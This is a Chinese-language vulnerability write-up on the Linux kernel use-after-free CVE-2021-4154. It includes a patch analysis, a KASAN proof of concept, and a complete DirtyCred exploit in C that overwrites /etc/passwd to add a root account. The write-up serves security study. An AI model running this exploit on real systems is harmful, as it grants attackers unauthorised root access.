CVE-2021-4154 漏洞分析及利用

Dritycred利用示例中的第一个漏洞 - CVE-2021-4154,相关ppt、论文、源码如下:

BlackHat USA 2022 - Cautious! A New Exploitation Method! No Pipe but as Nasty as Dirty Pipe

论文 - DirtyCred: Escalating Privilege in Linux Kernel

github - Markakd/DirtyCred

针对该漏洞,除了Dritycred利用方法,还可以通过cross-cache常规方法来做(过程更复杂)。

漏洞分析

漏洞点信息:cgroup: verify that source is a string

漏洞修复patch如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
diff --git a/kernel/cgroup/cgroup-v1.c b/kernel/cgroup/cgroup-v1.c
index ee93b6e895874..527917c0b30be 100644
--- a/kernel/cgroup/cgroup-v1.c
+++ b/kernel/cgroup/cgroup-v1.c
@@ -912,6 +912,8 @@ int cgroup1_parse_param(struct fs_context *fc, struct fs_parameter *param)
opt = fs_parse(fc, cgroup1_fs_parameters, param, &result);
if (opt == -ENOPARAM) {
if (strcmp(param->key, "source") == 0) {
+ if (param->type != fs_value_is_string)
+ return invalf(fc, "Non-string source");
if (fc->source)
return invalf(fc, "Multiple sources not supported");
fc->source = param->string;

poc代码片段如下

1
2
3
4
int fscontext_fd = fsopen("cgroup");
int fd_null = open("/dev/null, O_RDONLY);
int fsconfig(fscontext_fd, FSCONFIG_SET_FD, "source", fd_null);
close_range(3, ~0U, 0); // close(fscontext_fd)时fd_null对应的struct file会被释放,产生UAF

漏洞点在fsconfig系统调用处理过程中,它将”文件描述符fd_null对应的file结构”当成了一个”存储字符串的堆块指针”,即混淆了如下结构体中fs_parameter->filefs_parameter->string

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
/*
* Configuration parameter.
*/
struct fs_parameter {
const char *key; /* Parameter name */
enum fs_value_type type:8; /* The type of value here */
union {
char *string;
void *blob;
struct filename *name;
struct file *file;
};
size_t size;
int dirfd;
};

于是将一个file结构指针赋值给了fc->source。当调用close(fscontext_fd)时释放fc->source(即fd_null对应的file结构),但此时fd_null仍然还在使用当中,于是出现了UAF。

跟踪一下UAF的形成过程:

  1. 先看一下给fc->source赋值的操作,跟踪fsconfig的调用路径

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    SYSCALL_DEFINE5(fsconfig, int, fd, unsigned int, cmd, const char __user *, _key, const void __user *, _value, int, aux)
    /*
    if (_key) {
    param.key = strndup_user(_key, 256);
    }
    ......
    case FSCONFIG_SET_FD:
    param.type = fs_value_is_file;
    ret = -EBADF;
    param.file = fget(aux); // fget():通过文件描述符查找并返回file结构体,并且给file->f_count引用数加1
    // fput(): 与fget()对应,对f_count进行-1,如果发现f_count为0了,那么将其对应的struct file结构删除
    if (!param.file)
    goto out_key;
    break;
    */

    vfs_fsconfig_locked(fc, cmd, &param);

    vfs_parse_fs_param(fc, param);

    fc->ops->parse_param(fc, param);

    cgroup1_parse_param(struct fs_context *fc, struct fs_parameter *param)
    /*
    if (strcmp(param->key, "source") == 0) {
    fc->source = param->string; // union:param->string即param->file
    param->string = NULL;
    return 0;
    }
    */
  2. 再看一下释放点,用户态执行close(fscontext_fd)后,内核调用路径如下

    1
    2
    3
    4
    5
    6
    7
    8
    fscontext_release()

    put_fs_context()
    /*
    put_filesystem(fc->fs_type);
    kfree(fc->source); // 此处释放后,导致fd_null对应得file结构体UAF
    kfree(fc);
    */

从代码逻辑来说:

​ cgroup v1的fs parser对于key为”source”的情况,默认aux应当指向一个字符串。然而,实际代码实现中,在指定key为”source”的情况下,指定aux指向一个文件描述符也是可以进入cgroup1_parse_param()分支的。所以,默认”source”对应的type总是fs_value_is_string导致了漏洞的产生,因为type也可能是fs_value_is_file。

从fs_parameter结构体角度来说:

​ 使用fs_parameter结构体中union结构时,按理说应当根据param->type的值来解析此时对应union的哪一个成员。但是cgroup1_parse_param()的参数解析流程并未检查param->type,理所当然解析为param->string,并赋值给fc->source(导致file结构体指针给到了fc->source)。

poc

poc中使用到了fsopen()fsconfig()两个函数,先了解一下:

1
2
3
4
5
6
7
8
9
10
11
/*
sys_fsopen - Open a filesystem by name so that it can be configured for mounting.
*/
asmlinkage long sys_fsopen(const char __user *fs_name, unsigned int flags);

/*
sys_fsconfig - Set parameters and trigger actions on a context
@cmd - fsconfig_set_fd: An open file descriptor is specified. @_value must be NULL and @aux indicates the file descriptor.
*/
asmlinkage long sys_fsconfig(int fs_fd, unsigned int cmd, const char __user *key,
const void __user *value, int aux);

poc代码如下,编译执行后,在dmesg中能看到UAF的打印(前提是内核开启了KASAN,不然无法捕捉到)。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
// gcc test.c -o test
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <stdarg.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <ctype.h>
#include <pthread.h>
#include <sys/mman.h>
#include <sys/syscall.h>

static void die(const char *fmt, ...) {
va_list params;
va_start(params, fmt);
vfprintf(stderr, fmt, params);
va_end(params);
exit(1);
}

void init_namespace(void) {
int fd;
char buff[0x100];

uid_t uid = getuid();
gid_t gid = getgid();

if (unshare(CLONE_NEWUSER | CLONE_NEWNS)) {
die("unshare(CLONE_NEWUSER | CLONE_NEWNS): %m");
}

if (unshare(CLONE_NEWNET)) {
die("unshare(CLONE_NEWNET): %m");
}

fd = open("/proc/self/setgroups", O_WRONLY);
snprintf(buff, sizeof(buff), "deny");
write(fd, buff, strlen(buff));
close(fd);

fd = open("/proc/self/uid_map", O_WRONLY);
snprintf(buff, sizeof(buff), "0 %d 1", uid);
write(fd, buff, strlen(buff));
close(fd);

fd = open("/proc/self/gid_map", O_WRONLY);
snprintf(buff, sizeof(buff), "0 %d 1", gid);
write(fd, buff, strlen(buff));
close(fd);
}


int main(){
init_namespace();
int fd_fscontext = syscall(__NR_fsopen, "cgroup", 0);
if (fd_fscontext < 0) {
perror("fsopen");
die("");
}
int fd_null = open("/dev/null", O_RDONLY);
syscall(__NR_fsconfig, fd_fscontext, 5, "source", 0, fd_null);
close(fd_fscontext);
close(fd_null);
//close_range(3, ~0U, 0);
}

dmesg中打印的信息如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
[ 1785.655850] ==================================================================
[ 1785.658925] BUG: KASAN: use-after-free in filp_close+0x26/0xb0
[ 1785.661875] Read of size 8 at addr ffff8883cd692c78 by task test/2163

[ 1785.667787] CPU: 6 PID: 2163 Comm: test Tainted: G L 5.4.0 #2
[ 1785.667790] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020
[ 1785.667793] Call Trace:
[ 1785.667808] dump_stack+0x96/0xca
[ 1785.667818] print_address_description.constprop.0+0x20/0x210
[ 1785.667824] ? filp_close+0x26/0xb0
[ 1785.667828] __kasan_report.cold+0x1b/0x41
[ 1785.667832] ? filp_close+0x26/0xb0
[ 1785.667836] kasan_report+0x12/0x20
[ 1785.667841] check_memory_region+0x129/0x1b0
[ 1785.667845] __kasan_check_read+0x11/0x20
[ 1785.667848] filp_close+0x26/0xb0
[ 1785.667854] __close_fd+0x11d/0x150
[ 1785.667858] __x64_sys_close+0x40/0x80
[ 1785.667865] do_syscall_64+0x72/0x210
[ 1785.667870] entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 1785.667876] RIP: 0033:0x7fe01ac4a817
[ 1785.667883] Code: ff ff e8 7c 12 02 00 66 2e 0f 1f 84 00 00 00 00 00 66 90 f3 0f 1e fa 64 8b 04 25 18 00 00 00 85 c0 75 10 b8 03 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 41 c3 48 83 ec 18 89 7c 24 0c e8 b3 5d f8 ff
[ 1785.667885] RSP: 002b:00007ffeba9710a8 EFLAGS: 00000246 ORIG_RAX: 0000000000000003
[ 1785.667891] RAX: ffffffffffffffda RBX: 000055e759df2640 RCX: 00007fe01ac4a817
[ 1785.667893] RDX: 000055e759df311a RSI: 0000000000000005 RDI: 0000000000000004
[ 1785.667895] RBP: 00007ffeba9710c0 R08: 0000000000000004 R09: 00007ffeba9711b0
[ 1785.667897] R10: 0000000000000000 R11: 0000000000000246 R12: 000055e759df21e0
[ 1785.667900] R13: 00007ffeba9711b0 R14: 0000000000000000 R15: 0000000000000000

[ 1785.670155] Allocated by task 2163:
[ 1785.672385] save_stack+0x23/0x90
[ 1785.672389] __kasan_kmalloc.constprop.0+0xcf/0xe0
[ 1785.672393] kasan_slab_alloc+0xe/0x10
[ 1785.672396] kmem_cache_alloc+0xce/0x240
[ 1785.672400] __alloc_file+0x2b/0x1c0
[ 1785.672402] alloc_empty_file+0x46/0xc0
[ 1785.672407] path_openat+0xd1/0x22f0
[ 1785.672410] do_filp_open+0x12b/0x1c0
[ 1785.672413] do_sys_open+0x1fb/0x2f0
[ 1785.672417] __x64_sys_openat+0x59/0x70
[ 1785.672421] do_syscall_64+0x72/0x210
[ 1785.672425] entry_SYSCALL_64_after_hwframe+0x44/0xa9

[ 1785.674579] Freed by task 2163:
[ 1785.676657] save_stack+0x23/0x90
[ 1785.676661] __kasan_slab_free+0x137/0x180
[ 1785.676664] kasan_slab_free+0xe/0x10
[ 1785.676667] kfree+0x98/0x260
[ 1785.676671] put_fs_context+0x16f/0x210
[ 1785.676674] fscontext_release+0x35/0x40
[ 1785.676678] __fput+0x16e/0x3a0
[ 1785.676680] ____fput+0xe/0x10
[ 1785.676686] task_work_run+0xc0/0xe0
[ 1785.676690] exit_to_usermode_loop+0x187/0x1c0
[ 1785.676693] do_syscall_64+0x1e0/0x210
[ 1785.676697] entry_SYSCALL_64_after_hwframe+0x44/0xa9

[ 1785.678642] The buggy address belongs to the object at ffff8883cd692c40
which belongs to the cache filp(1119:session-1.scope) of size 256
[ 1785.683211] The buggy address is located 56 bytes inside of
256-byte region [ffff8883cd692c40, ffff8883cd692d40)
[ 1785.687552] The buggy address belongs to the page:
[ 1785.689679] page:ffffea000f35a400 refcount:1 mapcount:0 mapping:ffff8883cfa661c0 index:0xffff8883cd6952c0 compound_mapcount: 0
[ 1785.689687] raw: 0017ffffc0010200 ffffea000cd81008 ffff8883d45ace50 ffff8883cfa661c0
[ 1785.689692] raw: ffff8883cd6952c0 00000000002e001f 00000001ffffffff 0000000000000000
[ 1785.689694] page dumped because: kasan: bad access detected

[ 1785.691712] Memory state around the buggy address:
[ 1785.693790] ffff8883cd692b00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 1785.695944] ffff8883cd692b80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 1785.698214] >ffff8883cd692c00: fc fc fc fc fc fc fc fc fb fb fb fb fb fb fb fb
[ 1785.699548] ^
[ 1785.701820] ffff8883cd692c80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 1785.703994] ffff8883cd692d00: fb fb fb fb fb fb fb fb fc fc fc fc fc fc fc fc
[ 1785.706162] ==================================================================
[ 1785.708370] Disabling lock debugging due to kernel taint

利用方法 - dirtycred

利用的逻辑用几张图来描述:

  1. 首先是UAF如何产生的

    image-20230518220859656

  2. 然后,在理想条件下的利用思路

    根据dirtycred利用思路,在对文件检查和实际写入的窗口间隙,将file结构体替换成不具备写权限的特权文件。

    image-20230518222645219

    但是”check”和”write”的时间窗口实在太小了,很难构成利用。

  3. 最后,延长TOC-TOU时间窗口的利用思路

    image-20230518225350906

在原作者的exp基础上做了些更改,写了一版更简洁易读的利用代码。主要有以下几点区别:

  • 使用封装好的创建命名空间的函数
  • 使用更常用的write函数,而不是writev
  • 将写入数据缩小为1G,缩短exp执行时间,这个窗口完全足够利用
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <stdarg.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <ctype.h>
#include <pthread.h>
#include <assert.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/uio.h>
#include <sys/stat.h>
#include <linux/kcmp.h>

#ifndef __NR_fsconfig
#define __NR_fsconfig 431
#endif
#ifndef __NR_fsopen
#define __NR_fsopen 430
#endif

#define NR_PAGE 0x40000
#define MAX_FILE_NUM 1000
int uaf_fd;
int fds[MAX_FILE_NUM];

int run_write = 0;
int run_spray = 0;


static void die(const char *fmt, ...) {
va_list params;

va_start(params, fmt);
vfprintf(stderr, fmt, params);
va_end(params);
exit(1);
}


void init_namespace(void) {
int fd;
char buff[0x100];

uid_t uid = getuid();
gid_t gid = getgid();

if (unshare(CLONE_NEWUSER | CLONE_NEWNS)) {
die("unshare(CLONE_NEWUSER | CLONE_NEWNS): %m \n");
}

if (unshare(CLONE_NEWNET)) {
die("unshare(CLONE_NEWNET): %m \n");
}

fd = open("/proc/self/setgroups", O_WRONLY);
snprintf(buff, sizeof(buff), "deny");
write(fd, buff, strlen(buff));
close(fd);

fd = open("/proc/self/uid_map", O_WRONLY);
snprintf(buff, sizeof(buff), "0 %d 1", uid);
write(fd, buff, strlen(buff));
close(fd);

fd = open("/proc/self/gid_map", O_WRONLY);
snprintf(buff, sizeof(buff), "0 %d 1", gid);
write(fd, buff, strlen(buff));
close(fd);
}

static void use_temporary_dir(void) {
system("rm -rf exp_dir; mkdir exp_dir; touch exp_dir/data");
char *tmpdir = "exp_dir";
if (!tmpdir)
exit(1);
if (chmod(tmpdir, 0777))
exit(1);
if (chdir(tmpdir))
exit(1);
}

void trigger() {
int fs_fd = syscall(__NR_fsopen, "cgroup", 0);
if (fs_fd < 0) {
perror("fsopen");
die("");
}

symlink("./data", "./uaf"); // 为data文件创建一个软链接,避免打开的文件file->f_mode被加上FMODE_ATOMIC_POS标志

uaf_fd = open("./uaf", 1);
if (uaf_fd < 0) {
die("failed to open symbolic file\n");
}

if (syscall(__NR_fsconfig, fs_fd, 5, "source", 0, uaf_fd)) {
perror("fsconfig");
exit(-1);
}

close(fs_fd); // 释放uaf_fd对应的stuct file堆块
}

void *slow_write() {
printf("[*] start slow write to get the lock\n");
int fd = open("./uaf", 1);

if (fd < 0) {
perror("error open uaf file");
exit(-1);
}

unsigned long int addr = 0x30000000;
int offset;
// 利用mmap构造一大段"\x00"数据
for (offset = 0; offset < NR_PAGE; offset++) {
void *r = mmap((void *)(addr + offset * 0x1000), 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
if (r < 0) {
printf("allocate failed at 0x%x\n", offset);
}
}
assert(offset > 0);

uint64_t wr_len = (NR_PAGE-1)*0x1000;
run_write = 1;
if (write(fd, (void *)addr, wr_len) < 0) { // 构造了1G大小的空间,写入磁盘文件,延长TOC-TOU时间窗口
perror("slow write");
}

printf("[*] write done!\n");
close(fd);
}

void *write_cmd() {
char data[1024] = "bling:x:0:0:root:/home/bling:/bin/bash\nroot:x:0:0:root:/root:/bin/bash\n";

while (!run_write) {}

run_spray = 1;
if(write(uaf_fd, data, strlen(data)) < 0){ // 由于slow_write()正在写磁盘文件,此处在write check后会阻塞,空出来时间窗口给spray_files()
printf("failed to write\n");
}

printf("[*] overwrite done! It should be after the slow write\n");
}

void spray_files() {
int found = 0;

while (!run_spray) {}

printf("[*] got uaf fd %d, start spray....\n", uaf_fd);
for (int i = 0; i < MAX_FILE_NUM; i++) {
fds[i] = open("/etc/passwd", O_RDONLY); // 使用"/etc/passwd"文件的struct file占用UAF的file堆块
if (fds[i] < 0) {
perror("open file");
printf("%d\n", i);
}
// 比较uaf_fd和fds[i]是否指向同一个文件描述符,相同的话返回0
if (syscall(__NR_kcmp, getpid(), getpid(), KCMP_FILE, uaf_fd, fds[i]) == 0) {
found = 1;
printf("[!] found, file id %d\n", i);
for (int j = 0; j < i; j++)
close(fds[j]);
break;
}
}

if(found == 0){
printf("spary failed, try again!\n");
}
}

int main(){
pthread_t p_id, p_id_cmd;

use_temporary_dir(); // 新建一个目录,用来放利用所需的文件
init_namespace(); // 新建一个命名空间
trigger(); // 触发UAF中的free

pthread_create(&p_id, NULL, slow_write, NULL); // 拉长时间窗口
usleep(1);
pthread_create(&p_id_cmd, NULL, write_cmd, NULL); // UAF中的use,往已释放struct file的fd中写

spray_files(); // 堆喷,用高权限struct file占领UAF的file堆块

pthread_exit(NULL);
return 0;

}

使用ubuntu server 20.04 搭建虚拟机环境,成功改写/etc/passwd文件提权:

image-20230518203532228

利用方法 - cross-cache

todo…

这个解法不禁让我想起了前阵子D3ctf没做出来的kcache那道题…. cross cache + msgmsg + pipe buffer…. 先放一放,缓缓

我问我答

write(v)时,”check”和”write”在哪儿?

“check”点是指校验文件本身权限的位置,即file->f_mode是否有写标志。”write”点是指真正执行写操作的位置。

前者write和writev不在一个函数中,后者都在文件系统对应的写函数中。

read/write/readv/writev系统调用对应内核处理函数入口

1
2
3
4
5
writev -> do_writev
readv -> do_readv
write -> ksys_write
read -> ksys_read
open -> do_sys_open

以linux 5.4.0为例,跟踪一下writev和write两个系统调用处理过程中的”check”点和”write”点。

“check”位置:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
/* 
用户态调用writev(),内核对应处理流程如下,检查权限(check)的操作在do_iter_write()函数中:
writev -> do_writev -> vfs_writev -> do_iter_write -> do_iter_readv_writev -> call_write_iter -> file->f_op->write_iter
*/
static ssize_t do_iter_write(struct file *file, struct iov_iter *iter,
loff_t *pos, rwf_t flags)
{
// ......
if (!(file->f_mode & FMODE_WRITE)) // check
return -EBADF;
if (!(file->f_mode & FMODE_CAN_WRITE)) // check
return -EINVAL;

if (file->f_op->write_iter)
ret = do_iter_readv_writev(file, iter, pos, WRITE, flags);
// ......
return ret;
}


/*
用户态调用write(),内核对应处理流程如下,检查权限(check)的操作在vfs_write()函数中:
write -> ksys_write -> vfs_write -> new_sync_write -> call_write_iter -> file->f_op->write_iter
*/
ssize_t vfs_write(struct file *file, const char __user *buf, size_t count, loff_t *pos)
{
// ......
if (!(file->f_mode & FMODE_WRITE)) // check
return -EBADF;
if (!(file->f_mode & FMODE_CAN_WRITE)) // check
return -EINVAL;
// ......
else if (file->f_op->write_iter)
ret = new_sync_write(file, buf, count, pos);
// ......
return ret;
}

“write”位置:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
/*
针对磁盘文件,file->f_op上注册的是ext4_file_operations:
.rodata:FFFFFFFF82082840 public ext4_file_operations
.rodata:FFFFFFFF82082840 ext4_file_operations dq 0 ; DATA XREF: __ext4_iget+B32↑o
.rodata:FFFFFFFF82082840 ; ext4_create+E1↑o ...
.rodata:FFFFFFFF82082848 dq offset ext4_llseek
.rodata:FFFFFFFF82082850 dq 0
.rodata:FFFFFFFF82082858 dq 0
.rodata:FFFFFFFF82082860 dq offset ext4_file_read_iter
.rodata:FFFFFFFF82082868 dq offset ext4_file_write_iter

file->f_op->write_iter -> ext4_file_write_iter -> ext4_buffered_write_iter
*/
static ssize_t ext4_buffered_write_iter(struct kiocb *iocb,
struct iov_iter *from)
{
// ......
inode_lock(inode); // 文件系统不允许多个线程同时写入同一个文件,通过锁机制来保证某一时刻只有一个线程在写,这里便是写文件相关的锁
// ......
ret = generic_perform_write(iocb->ki_filp, from, iocb->ki_pos); // write
// ......
out:
inode_unlock(inode);
// ......
return ret;
}

所以利用中,一个进程通过大文件写延迟inode_unlock(inode);的执行时间,另一个进程便会停在inode_lock(inode);获取锁的位置。于是构造了"check" -> 暂停 -> "write"的效果,这两个进程的搭配下,大文件的大小可以决定TOC-TOU的时间窗口长度。

为什么选writev而不是write?

write也可以

Jann Horn 的 double-put exploit的场景下,需要使用writev,因为它利用内核读iovec结构时,让内核线程暂停执行。

而本漏洞利用中,让内核线程暂停的点在ext4_file_write_iter()函数中,对writev和write来说是一样的,两者都会走到该分支。

因为无所谓用writev还是write,所以我的exp中就选择了更熟悉的write函数。

为什么需要创建一个软链接来写入?

为了绕过__fdget_pos()函数中的锁

无论调用write()还是writev()写文件时,都会进入fdget_pos()函数。这个函数中会根据文件模式(file->f_mode),决定是否获取锁(file->f_pos_lock)。当file->f_mode中包含FMODE_ATOMIC_POS时,就会获取file->f_pos_lock这个锁,防止其他线程进入。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
static inline struct fd fdget_pos(int fd)
{
return __to_fd(__fdget_pos(fd));
}

unsigned long __fdget_pos(unsigned int fd)
{
unsigned long v = __fdget(fd);
struct file *file = (struct file *)(v & ~3);

if (file && (file->f_mode & FMODE_ATOMIC_POS)) {
if (file_count(file) > 1) {
v |= FDPUT_POS_UNLOCK;
mutex_lock(&file->f_pos_lock);
}
}
return v;
}

/* File needs atomic accesses to f_pos */
#define FMODE_ATOMIC_POS ((__force fmode_t)0x8000)

然而此时还未进行写文件权限校验,对于我们的利用来说需要一个权限校验后的锁,fdget_pos()函数的锁导致我们无法增加TOC-TOU的时间窗口,所以需要想办法绕过这个锁。

FMODE_ATOMIC_POS是从哪里来的呢?当我们open()一个文件时,会进入如下函数分支。当文件inode是一个常规文件或者目录时,文件的f_mode就会被添加FMODE_ATOMIC_POS标志。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
static int do_dentry_open(struct file *f,
struct inode *inode,
int (*open)(struct inode *, struct file *))
{
// ......
/* POSIX.1-2008/SUSv4 Section XSI 2.9.7 */
if (S_ISREG(inode->i_mode) || S_ISDIR(inode->i_mode))
f->f_mode |= FMODE_ATOMIC_POS;
// ......
}

S_ISLNK(st_mode) // 是否是一个链接.
S_ISREG(st_mode) // 是否是一个常规文件.
S_ISDIR(st_mode) // 是否是一个目录
S_ISCHR(st_mode) // 是否是一个字符设备.
S_ISBLK(st_mode) // 是否是一个块设备
S_ISFIFO(st_mode) // 是否是一个FIFO文件.
S_ISSOCK(st_mode) // 是否是一个SOCKET文件

所以,我们只需要为待写入的文件创建一个软链接,然后打开软链接写入,就可以避免f_mode被添加FMODE_ATOMIC_POS标志,也就可以绕过fdget_pos()函数中获取锁的操作。

参考文档

CVE-2021-4154 错误释放任意file对象-DirtyCred利用

Linux文件系统之mount

新一代mount系统调用(1)——接口初探

【C语言】S_ISDIR S_ISREG等常见的几个宏

kcmp(2) — Linux manual page